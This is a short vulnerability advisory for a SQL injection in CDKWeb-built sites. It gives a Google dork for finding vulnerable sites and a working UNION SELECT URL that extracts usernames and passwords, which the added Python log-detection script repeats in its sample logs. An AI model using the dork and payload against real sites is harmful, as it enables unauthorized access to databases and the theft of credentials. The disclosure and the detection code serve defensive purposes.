CDKWeb SQL Injection

2014.02.11
Credit: Th3 R0cksT3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

==== Exploit Author: Th3 R0cksT3r ====
# Exploit Title: CDKWeb SQL injection
# Date: 06.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.cdkweb.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Design and Web Development by CDKWeb
# Risk: High

=== Description ===
An attacker can obtain database information through this vulnerability.

Proof Of Concept:
http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+

=== Solution ===
Upgrade to latest version.

# Greetz: Back Bone, Demon, Orions Hunter, Dark Knight Sparda, Gh0st KilL3r, Luge, Code Breaker, Darklord, Devil Prince, Rakhal Beduin, Bakeer Bhai, R007 C0D3, Dipto, 8l@ck 3xplor3r, Sparrow, Bd Matrix, Cyber Blader, Batchfweak and BD BLACK HAT
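
Added example, not part of the original advisory: a log check that finds requests shaped like the proof of concept above in web server access logs. It assumes combined-format logs and that a legitimate `id` is a plain integer; the sample lines and the `scan` helper are constructed for illustration, and the check goes slightly beyond the PoC by also flagging any non-integer `id`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumed combined log format).
# Only the second request's URL comes from the advisory's proof of concept.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Feb/2014:10:00:01 +0000] "GET /pressReleaseDetails.php?id=136 HTTP/1.1" 200 5120
203.0.113.9 - - [06/Feb/2014:10:00:07 +0000] "GET /pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+ HTTP/1.1" 200 7340
203.0.113.7 - - [06/Feb/2014:10:00:09 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
203.0.113.8 - - [06/Feb/2014:10:00:12 +0000] "GET /pressReleaseDetails.php?id=12abc HTTP/1.1" 200 5120
"""

TARGET = "/pressReleaseDetails.php"            # script named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|group_concat|from)\b|--|'", re.I)


def scan(log_text):
    """Return (client_ip, verdict, decoded_id) for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(TARGET):
            continue                            # other scripts are out of scope here
        # parse_qs URL-decodes the value: %27 -> ', %28 -> (, + -> space
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if re.fullmatch(r"[0-9]+", value):
                continue                        # assumption: valid ids are integers
            verdict = "sqli" if SQL_TOKENS.search(value) else "non-integer"
            findings.append((line.split()[0], verdict, value))
    return findings


if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{verdict}\t{value!r}")
```

Matching on the decoded value matters because the raw log line carries `%27` and `%28` rather than the quote and parenthesis a plain-text search would look for.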



Copyright 2024, cxsecurity.com
